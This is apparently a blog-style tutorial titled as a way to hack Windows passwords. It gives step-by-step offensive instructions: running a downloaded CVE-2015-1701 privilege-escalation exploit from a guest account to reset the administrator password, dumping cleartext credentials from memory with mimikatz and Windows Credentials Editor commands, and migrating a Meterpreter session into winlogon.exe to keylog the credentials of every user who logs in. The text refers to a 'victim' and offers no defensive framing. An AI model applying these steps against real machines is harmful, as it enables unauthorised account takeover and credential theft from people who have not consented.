Hack Windows 7 Password from Guest Account using 2015-1701 Exploit (Easy Way)

From Wikipedia

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Now here type net user command to change the admin password but it will show you the error “Access is denied”

Download CVE 2015-1701 from here and unzip in your Pc. Then go to the compiled folder in CVE Master. Here you will find 2 exe files for 32-bit user and 64-bit user(in my case I’m using 64-bit user).

Now run Taihou64.exe, it will open a command prompt with admin priveleges. Now you can change the password using net user command. Example is given below:

Syntax:

net user (username) *   then press enter

Note: This trick works only on Windows7(all versions) not available for Windows8 and Windows10 yet.

Hack Windows Password in Clear Text using Mimikatz and Windows Credentials Editor

Mimikatz

mimikatz is a tool to check Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

First Download mimikatz windows version from here. And right click on it & Run it as Administrator.

It will open mimikatz windows.

Type the following command to check  privilege

privilege::debug

Now type the following command to get users passwords in text mode.

sekurlsa::logonPasswords

Windows Credentials Editor

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and clear text passwords).

First Download WCE from here.

Go to WCE directory & execute the following command as Administrator. And run the following command

 wce.exe -w It will show the password in plaintext.

Hack Remote Windows Password using Keylogger in Meterpreter

Once you got the meterpreter session use ‘ps‘ command to displays a list of running processes on the target.

The next step is we need to migrate Meterpreter to the winlogon.exe process. Victim winlogon.exe process ID is 600. Now type migrate 600 now we can start the keylogger

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

This will capture the credentials of all users logging into the system as long as this is running.